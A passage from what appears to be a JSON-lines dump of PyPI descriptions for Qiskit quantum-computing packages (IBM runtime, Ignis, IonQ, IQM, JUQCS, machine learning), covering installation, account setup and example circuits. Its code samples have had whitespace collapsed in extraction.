spirit, you can check the providers that you have access to via:IBMQ.providers()In addition, since the new IBM Quantum provides only one set of\ncredentials, the account management methods in IBMQ are now in singular form.\nFor example, you should useIBMQ.load_account()instead ofIBMQ.load_accounts(). AnIBMQAccountErrorexception is raised if you\nattempt to use the legacy methods with an IBM Quantum v2 account.The following tables contains a quick reference for the differences between the\ntwo versions. Please refer to the documentation of each method for more in\ndepth details:Account management<0.3 / v1 credentials>=0.3 and v2 credentialsN/AIBMQ.update_account()IBMQ.save_account(token, url)IBMQ.save_account(token)IBMQ.load_accounts()provider = IBMQ.load_account()IBMQ.enable_account()provider = IBMQ.enable_account()IBMQ.disable_accounts()IBMQ.disable_account()IBMQ.active_accounts()IBMQ.active_account()IBMQ.stored_accounts()IBMQ.stored_account()IBMQ.delete_accounts()IBMQ.delete_account()Using backends<0.3 / v1 credentials>=0.3 and v2 credentialsN/Aproviders = IBMQ.providers()backend = IBMQ.get_backend(name, hub='HUB')provider = IBMQ.get_provider(hub='HUB')backend = provider.get_backend(name)backends = IBMQ.backends(hub='HUB')provider = IBMQ.get_provider(hub='HUB')backends = provider.backends()Contribution GuidelinesIf you'd like to contribute to IBM Quantum Provider, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct.\nBy participating, you are expect to uphold to this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community use the\ninvite link atQiskit.org. For questions that are more suited for a forum we\nuse theQiskittag inStack Exchange.Next StepsNow you're set up and ready to check out some of the other examples from ourQiskit Tutorialrepository.Authors and CitationThe Qiskit IBM Quantum Provider is the work ofmany peoplewho contribute to the\nproject at different levels. If you use Qiskit, please cite as per the includedBibTeX file.LicenseApache License 2.0."} +{"package": "qiskit-ibm-runtime", "pacakge-description": "Qiskit Runtime IBM ClientQiskitis an open-source SDK for working with quantum computers at the level of extended quantum circuits, operators, and primitives.Qiskit IBM Runtimeis a new environment offered by IBM Quantum that streamlines quantum computations and provides optimal\nimplementations of the Qiskit primitivessamplerandestimatorfor IBM Quantum hardware. It is designed to use additional classical compute resources to execute quantum circuits with more efficiency on quantum processors, by including near-time computations such as error suppression and error mitigation. Examples of error suppression include dynamical decoupling, noise-aware compilation, error mitigation including readout mitigation, zero-noise extrapolation (ZNE), and probabilistic error cancellation (PEC).Using the runtime service, a research team at IBM Quantum was able to achieve a 120x speedup\nin their lithium hydride simulation. For more information, see theIBM Research blog.This module provides the interface to access the Qiskit Runtime service on IBM Quantum Platform or IBM Cloud.InstallationYou can install this package using pip:pipinstallqiskit-ibm-runtimeAccount setupQiskit Runtime service on IBM Quantum PlatformYou will need your IBM Quantum API token to authenticate with the runtime service:Create an IBM Quantum account or log in to your existing account by visiting theIBM Quantum login page.Copy (and optionally regenerate) your API token from yourIBM Quantum account page.Qiskit Runtime service on IBM CloudThe runtime service is now part of the IBM Quantum Services on IBM Cloud. To use this service, you'll\nneed to create an IBM Cloud account and a quantum service instance.This guidecontains step-by-step instructions, including how to find your\nIBM Cloud API key and Cloud Resource Name (CRN), which you will need for authentication.Save your account on diskOnce you have the account credentials, you can save them on disk, so you won't have to input\nthem each time. The credentials are saved in the$HOME/.qiskit/qiskit-ibm.jsonfile, where$HOMEis your home directory.:warning: Account credentials are saved in plain text, so only do so if you are using a trusted device.fromqiskit_ibm_runtimeimportQiskitRuntimeService# Save an IBM Cloud account.QiskitRuntimeService.save_account(channel=\"ibm_cloud\",token=\"MY_IBM_CLOUD_API_KEY\",instance=\"MY_IBM_CLOUD_CRN\")# Save an IBM Quantum account.QiskitRuntimeService.save_account(channel=\"ibm_quantum\",token=\"MY_IBM_QUANTUM_TOKEN\")Once the account is saved on disk, you can instantiate the service without any arguments:fromqiskit_ibm_runtimeimportQiskitRuntimeServiceservice=QiskitRuntimeService()Loading account from environment variablesAlternatively, the service can discover credentials from environment variables:exportQISKIT_IBM_TOKEN=\"MY_IBM_CLOUD_API_KEY\"exportQISKIT_IBM_INSTANCE=\"MY_IBM_CLOUD_CRN\"exportQISKIT_IBM_CHANNEL=\"ibm_cloud\"Then instantiate the service without any arguments:fromqiskit_ibm_runtimeimportQiskitRuntimeServiceservice=QiskitRuntimeService()Enabling account for current Python sessionAs another alternative, you can also enable an account just for the current session by instantiating the\nservice with your credentials.fromqiskit_ibm_runtimeimportQiskitRuntimeService# For an IBM Cloud account.ibm_cloud_service=QiskitRuntimeService(channel=\"ibm_cloud\",token=\"MY_IBM_CLOUD_API_KEY\",instance=\"MY_IBM_CLOUD_CRN\")# For an IBM Quantum account.ibm_quantum_service=QiskitRuntimeService(channel=\"ibm_quantum\",token=\"MY_IBM_QUANTUM_TOKEN\")PrimitivesAll quantum applications and algorithms level are fundamentally built using three steps:Choose a quantum circuit to encode the quantum state.Define the observable or the classical register to be measured.Execute the quantum circuits by using a primitive (Estimator or Sampler).Primitivesare base-level functions that serve as building blocks for many quantum algorithms and applications. Theprimitive interfacesare defined in Qiskit.The IBM Runtime service offers these primitives with additional features, such as built-in error suppression and mitigation.There are several different options you can specify when calling the primitives. Seeqiskit_ibm_runtime.Optionsclass for more information.SamplerThis primitive takes a list of user circuits (including measurements) as input and generates an error-mitigated readout of quasi-probability distributions. This provides users a way to better evaluate shot results using error mitigation, and enables them to more efficiently evaluate the possibility of multiple relevant data points in the context of destructive interference.To invoke theSamplerprimitivefromqiskit_ibm_runtimeimportQiskitRuntimeService,Options,SamplerfromqiskitimportQuantumCircuitservice=QiskitRuntimeService()options=Options(optimization_level=1)options.execution.shots=1024# Options can be set using auto-complete.# 1. A quantum circuit for preparing the quantum state (|00> + |11>)/rt{2}bell=QuantumCircuit(2)bell.h(0)bell.cx(0,1)# 2. Map the qubits to a classical register in ascending orderbell.measure_all()# 3. Execute using the Sampler primitivebackend=service.get_backend('ibmq_qasm_simulator')sampler=Sampler(backend=backend,options=options)job=sampler.run(circuits=bell)print(f\"Job ID is{job.job_id()}\")print(f\"Job result is{job.result()}\")EstimatorThis primitive takes circuits and observables as input, to evaluate expectation values and variances for a given parameter input. This Estimator allows users to efficiently calculate and interpret expectation values of quantum operators required for many algorithms.To invoke theEstimatorprimitive:fromqiskit_ibm_runtimeimportQiskitRuntimeService,Options,Estimatorfromqiskit.quantum_infoimportSparsePauliOpfromqiskitimportQuantumCircuitfromqiskit.circuitimportParameterimportnumpyasnpservice=QiskitRuntimeService()options=Options(optimization_level=1)options.execution.shots=1024# Options can be set using auto-complete.# 1. A quantum circuit for preparing the quantum state (|000> + e^{itheta} |111>)/rt{2}theta=Parameter('\u03b8')qc_example=QuantumCircuit(3)qc_example.h(0)# generate superpositionqc_example.p(theta,0)# add quantum phaseqc_example.cx(0,1)# condition 1st qubit on 0th qubitqc_example.cx(0,2)# condition 2nd qubit on 0th qubit# 2. the observable to be measuredM1=SparsePauliOp.from_list([(\"XXY\",1),(\"XYX\",1),(\"YXX\",1),(\"YYY\",-1)])# batch of theta parameters to be executedpoints=50theta1=[]forxinrange(points):theta=[x*2.0*np.pi/50]theta1.append(theta)# 3. Execute using the Estimator primitivebackend=service.get_backend('ibmq_qasm_simulator')estimator=Estimator(backend,options=options)job=estimator.run(circuits=[qc_example]*points,observables=[M1]*points,parameter_values=theta1)print(f\"Job ID is{job.job_id()}\")print(f\"Job result is{job.result().values}\")This code batches together 50 parameters to be executed in a single job. If a user wanted to find thethetathat optimized the observable, they could plot and observe it occurs attheta=np.pi/2. For speed we recommend batching results together (note that depending on your access, there may be limits on the number of circuits, objects, and parameters that you can send).SessionIn many algorithms and applications, an Estimator needs to be called iteratively without incurring queuing delays on each iteration. To solve this, the IBM Runtime service provides aSession. A session starts when the first job within the session is started, and subsequent jobs within the session are prioritized by the scheduler.You can use theqiskit_ibm_runtime.Sessionclass to start a\nsession. Consider the same example above and try to find the optimaltheta. The following example uses thegolden search methodto iteratively find the optimal theta that maximizes the observable.To invoke theEstimatorprimitive within a session:fromqiskit_ibm_runtimeimportQiskitRuntimeService,Session,Options,Estimatorfromqiskit.quantum_infoimportSparsePauliOpfromqiskitimportQuantumCircuitfromqiskit.circuitimportParameterimportnumpyasnpservice=QiskitRuntimeService()options=Options(optimization_level=1)options.execution.shots=1024# Options can be set using auto-complete.# 1. A quantum circuit for preparing the quantum state (|000> + e^{itheta} |111>)/rt{2}theta=Parameter('\u03b8')qc_example=QuantumCircuit(3)qc_example.h(0)# generate superpostionqc_example.p(theta,0)# add quantum phaseqc_example.cx(0,1)# condition 1st qubit on 0th qubitqc_example.cx(0,2)# condition 2nd qubit on 0th qubit# 2. the observable to be measuredM1=SparsePauliOp.from_list([(\"XXY\",1),(\"XYX\",1),(\"YXX\",1),(\"YYY\",-1)])gr=(np.sqrt(5)+1)/2# golden ratiothetaa=0# lower range of thetathetab=2*np.pi# upper range of thetatol=1e-1# tol# 3. Execute iteratively using the Estimator primitivewithSession(service=service,backend=\"ibmq_qasm_simulator\")assession:estimator=Estimator(session=session,options=options)#next test rangethetac=thetab-(thetab-thetaa)/grthetad=thetaa+(thetab-thetaa)/grwhileabs(thetab-thetaa)>tol:print(f\"max value of M1 is in the range theta ={[thetaa,thetab]}\")job=estimator.run(circuits=[qc_example]*2,observables=[M1]*2,parameter_values=[[thetac],[thetad]])test=job.result().valuesiftest[0]>test[1]:thetab=thetadelse:thetaa=thetacthetac=thetab-(thetab-thetaa)/grthetad=thetaa+(thetab-thetaa)/gr# Final job to evaluate Estimator at midpoint found using golden search methodtheta_mid=(thetab+thetaa)/2job=estimator.run(circuits=qc_example,observables=M1,parameter_values=theta_mid)print(f\"Session ID is{session.session_id}\")print(f\"Final Job ID is{job.job_id()}\")print(f\"Job result is{job.result().values}at theta ={theta_mid}\")This code returnsJob result is [4.] at theta = 1.575674623307102using only nine iterations. This is a very powerful extension to the primitives. However, using too much code between iterative calls can lock the QPU and use excessive QPU time, which is expensive. We recommend only using sessions when needed. The Sampler can also be used within a session, but there are not any well-defined examples for this.InstancesAccess to IBM Quantum Platform channel is controlled by the instances (previously called providers) to which you are assigned. An instance is defined by a hierarchical organization of hub, group, and project. A hub is the top level of a given hierarchy (organization) and contains within it one or more groups. These groups are in turn populated with projects. The combination of hub/group/project is called an instance. Users can belong to more than one instance at any time.NOTE:IBM Cloud instances are different from IBM Quantum Platform instances. IBM Cloud does not use the hub/group/project structure for user management. To view and create IBM Cloud instances, visit theIBM Cloud Quantum Instances page.To view a list of your instances, visit youraccount settings pageor use theinstances()method.You can specify an instance when initializing the service or provider, or when picking a backend:# Optional: List all the instances you can access.service=QiskitRuntimeService(channel='ibm_quantum')print(service.instances())# Optional: Specify the instance at service level. This becomes the default unless overwritten.service=QiskitRuntimeService(channel='ibm_quantum',instance=\"hub1/group1/project1\")backend1=service.backend(\"ibmq_manila\")# Optional: Specify the instance at the backend level, which overwrites the service-level specification when this backend is used.backend2=service.backend(\"ibmq_manila\",instance=\"hub2/group2/project2\")sampler1=Sampler(backend=backend1)# this will use hub1/group1/project1sampler2=Sampler(backend=backend2)# this will use hub2/group2/project2If you do not specify an instance, then the code will select one in the following order:If your account only has access to one instance, it is selected by default.If your account has access to multiple instances, but only one can access the requested backend, the instance with access is selected.In all other cases, the code selects the first instance other than ibm-q/open/main that has access to the backend.Access your IBM Quantum backendsAbackendis a quantum device or simulator capable of running quantum circuits or pulse schedules.You can query for the backends you have access to. Attributes and methods of the returned instances\nprovide information, such as qubit counts, error rates, and statuses, of the backends.fromqiskit_ibm_runtimeimportQiskitRuntimeServiceservice=QiskitRuntimeService()# Display all backends you have access.print(service.backends())# Get a specific backend.backend=service.backend('ibmq_qasm_simulator')# Print backend coupling map.print(backend.coupling_map)Next StepsNow you're set up and ready to check out some of thetutorials.Contribution guidelinesIf you'd like to contribute to qiskit-ibm-runtime, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct.\nBy participating, you are expected to uphold to this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community use the\ninvite link atibm.com/quantum/qiskit. For questions that are more suited for a forum we\nuse theQiskittag inStack Exchange.LicenseApache License 2.0."} +{"package": "qiskit-ignis", "pacakge-description": "Qiskit Ignis (DEPRECATED)NOTEAs of the version 0.7.0 Qiskit Ignis is deprecated and has been\nsuperseded by theQiskit Experimentsproject.\nActive development on the project has stopped and only compatibility fixes\nand other critical bugfixes will be accepted until the project is officially\nretired and archived.Qiskitis an open-source framework for working with noisy quantum computers at the level of pulses, circuits, and algorithms.Qiskit is made up of elements that each work together to enable quantum computing. This element isIgnis, which provides tools for quantum hardware verification, noise characterization, and error correction.Migration GuideAs of version 0.7.0, Qiskit Ignis has been deprecated and some of its functionality\nwas migrated into theqiskit-experimentspackage and intoqiskit-terra.Ignis characterization moduleThis module was partly migrated toqiskit-experimentsand split into two different modules:qiskit_experiments.library.calibrationqiskit_experiments.library.characterizationAmpCalis now replaced byFineAmplitude.ZZFitterwas not migrated yet.Ignis discriminator moduleThis module is in the process of migration toqiskit-experimentsIgnis mitigation moduleThe readout mitigator will be soon added toqiskit-terra.Experiments for generating the readout mitigators will be added toqiskit-experimentsFor use of mitigators withqiskit.algorithmsand theQuantumInstanceclassthis has been integrated intoqiskit-terradirectly with theQuantumInstance.Ignis verification moduleRandomized benchmarking, Quantum Volume and State and Process Tomography were migrated toqiskit-experiments.Migration of Gate-set tomography toqiskit-experimentsis in progress.topological_codeswill continue development underNCCR-SPIN, while the functionality is reintegrated into Qiskit. Some additional functionality can also be found in the offshoot projectqtcodes.Currently the Accredition and Entanglement modules have not been migrated.The following table gives a more detailed breakdown that relates the function, as it existed in Ignis,\nto where it now lives after this move.OldNewLibraryqiskit.ignis.characterization.calibrationsqiskit_experiments.library.calibrationqiskit-experimentsqiskit.ignis.characterization.coherenceqiskit_experiments.library.characterizationqiskit-experimentsqiskit.ignis.mitigationqiskit_terra.mitigationqiskit-terraqiskit.ignis.verification.quantum_volumeqiskit_experiments.library.quantum_volumeqiskit-experimentsqiskit.ignis.verification.randomized_benchmarkingqiskit_experiments.library.randomized_benchmarkingqiskit-experimentsqiskit.ignis.verification.tomographyqiskit_experiments.library.tomographyqiskit-experimentsInstallationWe encourage installing Qiskit via the pip tool (a python package manager). The following command installs the core Qiskit components, including Ignis.pipinstallqiskitPip will handle all dependencies automatically for us and you will always install the latest (and well-tested) version.To install from source, follow the instructions in thecontribution guidelines.Extra RequirementsSome functionality has extra optional requirements. If you're going to use any\nvisualization functions for fitters you'll need to install matplotlib. You\ncan do this withpip install matplotlibor when you install ignis withpip install qiskit-ignis[visualization]. If you're going to use a cvx fitter\nfor running tomogography you'll need to install cvxpy. You can do this withpip install cvxpyor when you install ignis withpip install qiskit-ignis[cvx]. When performing expectation value measurement\nerror mitigation using the CTMP method performance can be improved using\njust-in-time compiling if Numbda is installed. You can do this withpip install numbaor when you install ignis withpip install qiskit-ignis[jit]. For using the discriminator classes inqiskit.ignis.measurementscikit-learn needs to be installed. You can do this withpip install scikit-learnor when you install ignis withpip install qiskit-ignis[iq]. If you want to install all extra requirements\nwhen you install ignis you can runpip install qiskit-ignis[visualization,cvx,jit,iq].Creating your first quantum experiment with Qiskit IgnisNow that you have Qiskit Ignis installed, you can start creating experiments, to reveal information about the device quality. Here is a basic example:$ python# Import Qiskit classesimportqiskitfromqiskitimportQuantumRegister,QuantumCircuit,ClassicalRegisterfromqiskit.providers.aerimportnoise# import AER noise model# Measurement error mitigation functionsfromqiskit.ignis.mitigation.measurementimport(complete_meas_cal,CompleteMeasFitter,MeasurementFilter)# Generate a noise model for the qubitsnoise_model=noise.NoiseModel()forqiinrange(5):read_err=noise.errors.readout_error.ReadoutError([[0.75,0.25],[0.1,0.9]])noise_model.add_readout_error(read_err,[qi])# Generate the measurement calibration circuits# for running measurement error mitigationqr=QuantumRegister(5)meas_cals,state_labels=complete_meas_cal(qubit_list=[2,3,4],qr=qr)# Execute the calibration circuitsbackend=qiskit.Aer.get_backend('qasm_simulator')job=qiskit.execute(meas_cals,backend=backend,shots=1000,noise_model=noise_model)cal_results=job.result()# Make a calibration matrixmeas_fitter=CompleteMeasFitter(cal_results,state_labels)# Make a 3Q GHZ statecr=ClassicalRegister(3)ghz=QuantumCircuit(qr,cr)ghz.h(qr[2])ghz.cx(qr[2],qr[3])ghz.cx(qr[3],qr[4])ghz.measure(qr[2],cr[0])ghz.measure(qr[3],cr[1])ghz.measure(qr[4],cr[2])# Execute the GHZ circuit (with the same noise model)job=qiskit.execute(ghz,backend=backend,shots=1000,noise_model=noise_model)results=job.result()# Results without mitigationraw_counts=results.get_counts()print(\"Results without mitigation:\",raw_counts)# Create a measurement filter from the calibration matrixmeas_filter=meas_fitter.filter# Apply the filter to the raw counts to mitigate# the measurement errorsmitigated_counts=meas_filter.apply(raw_counts)print(\"Results with mitigation:\",{l:int(mitigated_counts[l])forlinmitigated_counts})Results without mitigation: {'000': 181, '001': 83, '010': 59, '011': 65, '100': 101, '101': 48, '110': 72, '111': 391}\n\nResults with mitigation: {'000': 421, '001': 2, '011': 1, '100': 53, '110': 13, '111': 510}Contribution GuidelinesIf you'd like to contribute to Qiskit Ignis, please take a look at ourcontribution guidelines. This project adheres to Qiskit'scode of conduct. By participating, you are expect to uphold to this code.We useGitHub issuesfor tracking requests and bugs. Please use ourslackfor discussion and simple questions. To join our Slack community use thelink. For questions that are more suited for a forum we use the Qiskit tag in theStack Exchange.Next StepsNow you're set up and ready to check out some of the other examples from ourQiskit Tutorialsrepository.Authors and CitationQiskit Ignis is the work ofmany peoplewho contribute\nto the project at different levels. If you use Qiskit, please cite as per the includedBibTeX file.LicenseApache License 2.0"} +{"package": "qiskit-ignis-rb", "pacakge-description": "qiskit-ignis-rbThis is a temporary fork of the originalqiskit-ignislibrary with just the RB specific modules. We plan to deprecate this and move toqiskit-experimentsonce we figure out the differences between the RB implementation in the two libraries.Please check the originalqiskit-ignislibrary for model details and documentation."} +{"package": "qiskit-ionq", "pacakge-description": "Qiskit IonQ ProviderQiskitis an open-source SDK for working with quantum computers at the level of circuits, algorithms, and application modules.This project contains a provider that allows access toIonQion trap quantum\nsystems.The example python notebook (in/example) should help you understand basic usage.API AccessThe IonQ Provider uses IonQ's REST API, and using the provider requires an API access token from IonQ. If you would like to use IonQ as a Qiskit provider, please visithttps://cloud.ionq.com/settings/keysto generate an IonQ API key.Installation:information_source:The Qiskit IonQ Provider requiresqiskit-terra>=0.17.4!To ensure you are on the latest version, run:pipinstall-U\"qiskit-terra>=0.17.4\"You can install the provider using pip:pipinstallqiskit-ionqProvider SetupTo instantiate the provider, make sure you have an access token then create a provider:fromqiskit_ionqimportIonQProviderprovider=IonQProvider(\"token\")Credential Environment VariablesAlternatively, the IonQ Provider can discover your access token from environment variables:exportIONQ_API_TOKEN=\"token\"Then invoke instantiate the provider without any arguments:fromqiskit_ionqimportIonQProvider,ErrorMitigationprovider=IonQProvider()Once the provider has been instantiated, it may be used to access supported backends:# Show all current supported backends:print(provider.backends())# Get IonQ's simulator backend:simulator_backend=provider.get_backend(\"ionq_simulator\")Submitting a CircuitOnce a backend has been specified, it may be used to submit circuits.\nFor example, running a Bell State:fromqiskitimportQuantumCircuit# Create a basic Bell State circuit:qc=QuantumCircuit(2,2)qc.h(0)qc.cx(0,1)qc.measure([0,1],[0,1])# Run the circuit on IonQ's platform with error mitigation:job=simulator_backend.run(qc,error_mitigation=ErrorMitigation.DEBIASING)# Print the results.print(job.result().get_counts())# Get results with a different aggregation method when debiasing# is applied as an error mitigation strategyprint(job.result(sharpen=True).get_counts())# The simulator specifically provides the the ideal probabilities and creates# counts by sampling from these probabilities. The raw probabilities are also accessible:print(job.result().get_probabilities())Basis gates and transpilationThe IonQ provider provides access to the full IonQ Cloud backend, which includes its own transpilation and compilation pipeline. As such, IonQ provider backends have a broad set of \"basis gates\" that they will accept \u2014\u00a0effectively anything the IonQ API will accept. They areccx, ch, cnot, cp, crx, cry, crz, csx, cx, cy, cz, h, i, id, mcp, mct, mcx, measure, p, rx, rxx, ry, ryy, rz, s, sdg, swap, sx, sxdg, t, tdg, toffoli, x, yandz.If you have circuits that you'd like to run on IonQ backends that use other gates than this (uoriswapfor example), you will either need to manually rewrite the circuit to only use the above list, or use the Qiskit transpiler, per the example below. Please note that not all circuits can be automatically transpiled.If you'd like lower-level access\u2014the ability to program in native gates and skip our compilation/transpilation pipeline\u2014please reach out to your IonQ contact for further information.fromqiskitimportQuantumCircuit,transpilefrommathimportpiqc2=QuantumCircuit(1,1)qc2.u(pi,pi/2,pi/4,0)qc2.measure(0,0)transpiled_circuit=transpile(qc2,simulator_backend)ContributingIf you'd like to contribute to the IonQ Provider, please take a look at thecontribution guidelines. This project adheres the Qiskit Community code of conduct. By participating, you are agreeing to uphold this code.If you have an enhancement request or bug report, we encourage you to open an issue inthis repo's issues tracker. If you have a support question or general discussion topic, we recommend instead asking on theQiskit community slack(you can join usingthis link) or theQuantum Computing StackExchange.Running TestsThis package uses thepytesttest runner, and other packages\nfor mocking interfactions, reporting coverage, etc.\nThese can be installed withpip install -r requirements-test.txt.To use pytest directly, just run:pytest[pytest-args]Alternatively, you may use the setuptools integration by running tests throughsetup.py, e.g.:pythonsetup.pytest--addopts=\"[pytest-args]\"FixturesGlobal pytest fixtures for the test suite can be found in the top-leveltest/conftest.pyfile.SSL certificate issuesIf you receive the errorSSLError(SSLCertVerificationError)or otherwise are unable to connect succesfully, there are a few possible resolutions:Try accessinghttps://api.ionq.co/v0.3/healthin your browser; if this does not load, you need to contact an IT administrator about allowing IonQ API access.pip install pip_system_certsinstructs python to use the same certificate roots of trust as your local browser - install this if the first step succeeded but qiskit-ionq continues to have issues.You can debug further by runningres = requests.get('https://api.ionq.co/v0.3/health', timeout=30)and inspectingres, you should receive a 200 response with the content{\"status\": \"pass\"}. If you see a corporate or ISP login page, you will need to contact a local IT administrator to debug further.DocumentationTo build the API reference and quickstart docs, run:pipinstall-rrequirements-docs.txt\nmakehtml\nopenbuild/html/index.htmlLicenseApache License 2.0.The IonQ logo and Q mark are copyright IonQ, Inc. All rights reserved."} +{"package": "qiskit-iqm", "pacakge-description": "Qiskit on IQMQiskitadapter forIQM\u2019squantum computers.What is it good for?With Qiskit on IQM, you can for example:Transpile arbitrary quantum circuits for IQM quantum architecturesSimulate execution with an IQM-specific noise modelExecute quantum circuits on an IQM quantum computerInstallationThe recommended way is to install the distribution packageqiskit-iqmdirectly from the\nPython Package Index (PyPI):$pipinstallqiskit-iqmDocumentationThe documentation of the latest Qiskit on IQM release is availablehere.Jump to ourUser guidefor a quick introduction on how to use Qiskit on IQM.CopyrightQiskit on IQM is free software, released under the Apache License, version 2.0.Copyright 2022-2024 Qiskit on IQM developers."} +{"package": "qiskit-iqm-unstable", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qiskit-jku-provider", "pacakge-description": "This module contains [Qiskit](https://www.qiskit.org/) simulator whose backend is written in JKU\u2019s simulator. This simulator simulate a Quantum circuit on a classical computer."} +{"package": "qiskit-juqcs", "pacakge-description": "qiskit-juqcsQiskit provider for JUQCS (Juelich Universal Quantum Computer Simulator).This package allows a user with validJudoorcredentials to useJUQCS(Juelich Universal Quantum Computer Simulator)\nfor simulating quantum circuits of up to 40 qubits on HPC systems of the Juelich Supercomputing Center.Currently two modes of operation are supported by the JUQCS simulator:Sampling mode (qasm_simulator): up to 100.000 shots and up to 40 qubits.Statevector mode (statevector_simulator): up to 20 qubits.Installationpipinstallgit+https://jugit.fz-juelich.de/qip/juniq-platform/qiskit-juqcs.gitorpipinstallgit+ssh://git@jugit.fz-juelich.de/qip/juniq-platform/qiskit-juqcs.gitFirst stepsIf you are using this package from JUNIQ-Cloud this step will be taken care of automatically, you may skip to the next section.If you are manually installing this package on your local machine you will be prompted to provide yourJudoorusername and password when first importing the module. These credentials will be stored in your machine so authentication against JUNIQ-service will happen automatically the next time. Every time it is imported, the package checks with JUNIQ-service if the credentials are valid. In case you provided the wrong credentials or you have updated them since the last time you used the package you will be prompted to provide them again.NOTEThe credentials will not be updated until you import the module again in a new Python session.Usage exampleThis section shows how to submit a circuit for simulation to JUQCS.Import Qiskit and create the circuit which we want to simulate:importqiskitcircuit=qiskit.QuantumCircuit(5)circuit.h(0)circuit.cx(0,1)circuit.cx(0,2)circuit.measure_all()Import the Juqcs provider and choose a backend from'statevector_simulator'or'qasm_simulator':fromjuqcsimportJuqcsbackend=Juqcs.get_backend('qasm_simulator')NOTESince each simulator returns a different type of output, different limitations for the maximum qubit size apply (20 qubits for'statevector_simulator'and 40 qubits for'qasm_simulator').So far the process has not deviated from the usage of a typical Qiskit backend, but the following step is unique to the JUQCS backends:backend.allocate(minutes=30,max_qubits=5,reservation=None)NOTEThis function may take a few minutes to return, depending largely on the load of the HPC system at the time of submission.Since the JUQCS simulator is deployed on an HPC system whose compute resources are shared with many other users, we now need to request the HPC system for permission to simulate our circuits. In this step we are making two \"promises\" to the HPC system, and the success of our simulation experiment depends on us keeping these promises:We promise that the biggest circuit that we want to simulate under this allocation will have at mostint(max_qubits)qubits. If we try to submit a bigger circuit the HPC system would not have allocated sufficient compute resources for us, so the simulation would fail. We only need to include this parameter if we want to simulate circuits larger than 32 qubits, since any circuit up to and including this size requires exactly the same amount of compute resources.We promise that we will be done with our simulation experiments withinint(minutes)minutes. By default, this parameter is set to 60 minutes, and the longest running allocation we can create is 24 hours (=1440 minutes). After this time is exceeded our allocation will expire, so circuit simulation submissions beyond this point would fail. In order to fix this we would need to create a new allocation.NOTEOptionally we can passstr(reservation)to our allocation request if we have been given an HPC reservation ID (e.g. when attending a training course at JSC). If you do not have a reservation ID do not worry, JUQCS will work without one too.We can make sure that the allocation has been successfully created for us by callingbackend.status().status_msg. If a valid allocation is available, we will see a message like'Resource allocation #{allocation ID} of {number} qubits available until {expiration time}.'.Now we can use our JUQCS backend just as any other typical Qiskit backend, e.g.:job=qiskit.execute(circuit,backend=backend,shots=1000,seed=10)result=job.result()print(result.get_counts())Whenjob.result()is called withpartial=Trueas argument, this method will attempt to retrieve partial results of failed jobs. In this case, precaution should be taken when accessing individual experiments, as doing so might cause an exception. Thesuccessattribute of the returned Result instance can be used to verify whether it contains partial results.Once we are finished with our experiments it is good practice to callbackend.deallocate().In case our allocation is still running this will revoke the allocation, so that we only get charged for the time our allocation was running, instead of for the time we promised the HPC system we would need the allocation for. If the allocation is not running anymore this function will not have any effect, so it's better to call it anyway to be on the safe side!Release History0.4.0Client-side changes to execute JUQCS on JURECA-dc.0.3.0Now using juniq-service:juqcs-service script bundle.Authentication mechanism reworked.Improved error handling and reporting.Several bugs fixed.0.2.0First public release.MetaCarlos Gonzalez Calaza -c.gonzalez.calaza@fz-juelich.deDistributed under the MIT license. SeeLICENSEfor more information.https://gitlab.com/juniq-platform/qiskit-juqcs"} +{"package": "qiskit-machine-learning", "pacakge-description": "Qiskit Machine LearningQiskit Machine Learning introduces fundamental computational building blocks - such as Quantum Kernels\nand Quantum Neural Networks - used in different applications, including classification and regression.\nOn the one hand, this design is very easy to use and allows users to rapidly prototype a first model\nwithout deep quantum computing knowledge. On the other hand, Qiskit Machine Learning is very flexible,\nand users can easily extend it to support cutting-edge quantum machine learning research.Qiskit Machine Learning provides theFidelityQuantumKernelclass that makes use of theFidelityalgorithm introduced in Qiskit and can be easily used to directly compute\nkernel matrices for given datasets or can be passed to a Quantum Support Vector ClassifierQSVCor\nQuantum Support Vector RegressorQSVRto quickly start solving classification or regression problems.\nIt also can be used with many other existing kernel-based machine learning algorithms from established\nclassical frameworks.Qiskit Machine Learning defines a generic interface for neural networks that is implemented by different\nquantum neural networks. Two core implementations are readily provided, such as theEstimatorQNN,\nand theSamplerQNN.\nTheEstimatorQNNleverages theEstimatorprimitive from Qiskit and\nallows users to combine parametrized quantum circuits with quantum mechanical observables. The circuits can be constructed using, for example, building blocks\nfrom Qiskit\u2019s circuit library, and the QNN\u2019s output is given by the expected value of the observable.\nTheSamplerQNNleverages another primitive introduced in Qiskit, theSamplerprimitive.\nThis neural network translates quasi-probabilities of bitstrings estimated by the primitive into a desired output. This\ntranslation step can be used to interpret a given bitstring in a particular context, e.g. translating it into a set of classes.The neural networks include the functionality to evaluate them for a given input as well as to compute the\ncorresponding gradients, which is important for efficient training. To train and use neural networks,\nQiskit Machine Learning provides a variety of learning algorithms such as theNeuralNetworkClassifierandNeuralNetworkRegressor.\nBoth take a QNN as input and then use it in a classification or regression context.\nTo allow an easy start, two convenience implementations are provided - the Variational Quantum ClassifierVQCas well as the Variational Quantum RegressorVQR.\nBoth take just a feature map and an ansatz and construct the underlying QNN automatically.In addition to the models provided directly in Qiskit Machine Learning, it has theTorchConnector,\nwhich allows users to integrate all of our quantum neural networks directly into thePyTorchopen source machine learning library. Thanks to Qiskit\u2019s gradient algorithms, this includes automatic\ndifferentiation - the overall gradients computed byPyTorchduring the backpropagation take into\naccount quantum neural networks, too. The flexible design also allows the building of connectors\nto other packages in the future.InstallationWe encourage installing Qiskit Machine Learning via the pip tool (a python package manager).pipinstallqiskit-machine-learningpipwill handle all dependencies automatically and you will always install the latest\n(and well-tested) version.If you want to work on the very latest work-in-progress versions, either to try features ahead of\ntheir official release or if you want to contribute to Machine Learning, then you can install from source.\nTo do this follow the instructions in thedocumentation.Optional InstallsPyTorch, may be installed either using commandpip install 'qiskit-machine-learning[torch]'to install the\npackage or refer to PyTorchgetting started. When PyTorch\nis installed, theTorchConnectorfacilitates its use of quantum computed networks.Sparse, may be installed using commandpip install 'qiskit-machine-learning[sparse]'to install the\npackage. Sparse being installed will enable the usage of sparse arrays/tensors.Creating Your First Machine Learning Programming Experiment in QiskitNow that Qiskit Machine Learning is installed, it's time to begin working with the Machine Learning module.\nLet's try an experiment using VQC (Variational Quantum Classifier) algorithm to\ntrain and test samples from a data set to see how 